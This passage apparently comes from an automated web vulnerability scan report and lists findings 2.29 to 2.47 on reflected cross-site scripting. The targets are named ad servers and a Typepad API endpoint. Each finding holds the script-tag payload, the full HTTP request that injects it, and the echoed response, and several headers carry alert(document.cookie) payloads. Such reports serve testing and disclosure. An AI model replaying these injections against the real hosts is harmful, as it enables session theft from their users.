Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 270

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH;target=_blank;grp=9112943&ef357"><script>alert(1)</script>0faf3202082=1;adiframe=y">
...[SNIP]...

2.29. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae473"><script>alert(1)</script>ccd142fd795 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH;target=_blank;grp=9112943ae473"><script>alert(1)</script>ccd142fd795 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 267

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH;target=_blank;grp=9112943ae473"><script>alert(1)</script>ccd142fd795;adiframe=y">
...[SNIP]...

2.30. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 4271d><script>alert(1)</script>2a331f8adb9 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH;target=4271d><script>alert(1)</script>2a331f8adb9 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 284

<html><body><base target=4271d><script>alert(1)</script>2a331f8adb9><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH;t
...[SNIP]...

2.31. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ec59"><script>alert(1)</script>023a78beb19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH1ec59"><script>alert(1)</script>023a78beb19;target=_blank;grp=9112943 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 268

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH1ec59"><script>alert(1)</script>023a78beb19;target=_blank;grp=9112943;adiframe=y">
...[SNIP]...

2.32. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee892"><script>alert(1)</script>2c0638b6731 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH;target=_blank;grp=9112943&ee892"><script>alert(1)</script>2c0638b6731=1 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 271

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH;target=_blank;grp=9112943&ee892"><script>alert(1)</script>2c0638b6731=1;adiframe=y">
...[SNIP]...

2.33. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 6b7bf><script>alert(1)</script>475490e67fb was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH;target=6b7bf><script>alert(1)</script>475490e67fb HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 285

<html><body><base target=6b7bf><script>alert(1)</script>475490e67fb><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH;
...[SNIP]...

2.34. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0236"><script>alert(1)</script>53375651d8e was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH;target=_blank;grp=9112943d0236"><script>alert(1)</script>53375651d8e HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 268

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH;target=_blank;grp=9112943d0236"><script>alert(1)</script>53375651d8e;adiframe=y">
...[SNIP]...

2.35. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52025"><script>alert(1)</script>9a88a4436ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH52025"><script>alert(1)</script>9a88a4436ff;target=_blank;grp=9112943 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 268

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH52025"><script>alert(1)</script>9a88a4436ff;target=_blank;grp=9112943;adiframe=y">
...[SNIP]...

2.36. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fae9a"><script>alert(1)</script>4eace70c3c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH;target=_blank;grp=9112943&fae9a"><script>alert(1)</script>4eace70c3c7=1 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 271

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH;target=_blank;grp=9112943&fae9a"><script>alert(1)</script>4eace70c3c7=1;adiframe=y">
...[SNIP]...

2.37. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9c6b"><script>alert(1)</script>29753d2027c was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH;target=_blank;grp=9112943b9c6b"><script>alert(1)</script>29753d2027c HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 268

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH;target=_blank;grp=9112943b9c6b"><script>alert(1)</script>29753d2027c;adiframe=y">
...[SNIP]...

2.38. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 531f7><script>alert(1)</script>a211c727b97 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH;target=531f7><script>alert(1)</script>a211c727b97 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 285

<html><body><base target=531f7><script>alert(1)</script>a211c727b97><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH;
...[SNIP]...

2.39. http://api.typepad.com/blogs/6a00d83451c82369e200d8341d0a2453ef/post-assets/@published/@recent.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.typepad.com
Path:   /blogs/6a00d83451c82369e200d8341d0a2453ef/post-assets/@published/@recent.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 479ae<script>alert(1)</script>c95f7cd83e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/6a00d83451c82369e200d8341d0a2453ef/post-assets/@published/@recent.js?479ae<script>alert(1)</script>c95f7cd83e8=1 HTTP/1.1
Host: api.typepad.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=151985724.1292505849.1.1.utmcsr=sixapart.com|utmccn=(referral)|utmcmd=referral|utmcct=/ns21bc1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eddc017331/at; __utma=151985724.1810450472.1292505849.1292505849.1292505849.1; __utmc=151985724; __utmb=151985724.1.10.1292505849;

Response

HTTP/1.0 400 Bad Request
Date: Thu, 16 Dec 2010 15:01:12 GMT
Server: Apache
X-Webserver: oak-tp-app004
Access-Control-Allow-Origin: *
Content-Length: 66
Content-Type: text/plain; charset=utf-8

Invalid query arguments: 479ae<script>alert(1)</script>c95f7cd83e8

2.40. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload facd8"><script>alert(1)</script>854027c3dcd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframefacd8"><script>alert(1)</script>854027c3dcd/3.0/5113.1/221794/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CD6406B6E651A44E171CE41F0006986; atdses=O;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addynfacd8"><script>alert(1)</script>854027c3dcd/3.0/5113.1/221794/0/-1/size=300x250;adiframe=y">
...[SNIP]...

2.41. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 696bf"><script>alert(1)</script>ef60ef84e1e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0696bf"><script>alert(1)</script>ef60ef84e1e/5113.1/221794/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CD6406B6E651A44E171CE41F0006986; atdses=O;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0696bf"><script>alert(1)</script>ef60ef84e1e/5113.1/221794/0/-1/size=300x250;adiframe=y">
...[SNIP]...

2.42. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e000b"><script>alert(1)</script>737cb734964 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1e000b"><script>alert(1)</script>737cb734964/221794/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CD6406B6E651A44E171CE41F0006986; atdses=O;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1e000b"><script>alert(1)</script>737cb734964/221794/0/-1/size=300x250;adiframe=y">
...[SNIP]...

2.43. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bbc4"><script>alert(1)</script>a1d6b9ee5d6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/2217948bbc4"><script>alert(1)</script>a1d6b9ee5d6/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CD6406B6E651A44E171CE41F0006986; atdses=O;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/2217948bbc4"><script>alert(1)</script>a1d6b9ee5d6/0/-1/size=300x250;adiframe=y">
...[SNIP]...

2.44. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3eed"><script>alert(1)</script>116ca518a2a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0d3eed"><script>alert(1)</script>116ca518a2a/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CD6406B6E651A44E171CE41F0006986; atdses=O;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0d3eed"><script>alert(1)</script>116ca518a2a/-1/size=300x250;adiframe=y">
...[SNIP]...

2.45. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd0ad"><script>alert(1)</script>3d04e0a0b58 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1fd0ad"><script>alert(1)</script>3d04e0a0b58/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CD6406B6E651A44E171CE41F0006986; atdses=O;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1fd0ad"><script>alert(1)</script>3d04e0a0b58/size=300x250;adiframe=y">
...[SNIP]...

2.46. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87afe"><script>alert(1)</script>db17970b29 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size87afe"><script>alert(1)</script>db17970b29=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CD6406B6E651A44E171CE41F0006986; atdses=O;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 228

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size87afe"><script>alert(1)</script>db17970b29=300x250;adiframe=y">
...[SNIP]...

2.47. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 408d4"><script>alert(1)</script>25739075e9e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size=300x250?408d4"><script>alert(1)</script>25739075e9e=1 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CD6406B6E651A44E171CE41F0006986; atdses=O;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 232

